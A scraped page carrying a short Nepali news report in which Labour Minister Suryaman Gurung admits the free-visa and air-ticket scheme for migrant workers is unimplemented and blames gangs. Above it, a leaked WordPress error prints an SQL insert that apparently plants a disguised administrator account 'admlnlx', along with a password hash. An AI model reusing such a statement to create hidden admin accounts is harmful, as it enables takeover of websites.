WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BIErHEk5qlzFt5S6gra71hov/kZw2F0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 19:23:34', '', 'admlnlx', 'admlnlx')
चितवन, माघ २२–
श्रममन्त्री सूर्यमान गुरुङले निःशुल्क भिसा र हवाई टिकट कार्यान्वयन र व्यवस्थित हुन नसकेको स्वीकार्नु भएको छ ।
आज यहाँ सञ्चारकर्मीसँग कुरा गर्दै उहाँले यसलाई कार्यान्वयन गर्न नदिन गिरोह सक्रिय रहेको बताउनुभयो । कार्यान्वयन गराउन खोज्दा मन्त्रालयमै धम्की आएको पनि उहाँको भनाइ थियो ।
रोजगारीका सिलसिलामा विदेसिनेहरूसँग दुईवटा सम्झौता गरी ठग्ने गरेको पाइएको भन्दै उहाँले यसलाई नियन्त्रण गर्न अनलाइनबाट फाराम भर्ने कामको थालनी गरिएको बताउनुभयो ।
मन्त्रालयले श्रम बजारको खोजी गरिरहेको भन्दै मन्त्री गुरुङले उपयुक्त श्रम बजारको खोजी गरी सुरक्षित रोजगार दिलाउन आफू प्रतिबद्ध रहेको पनि बताउनुभयो ।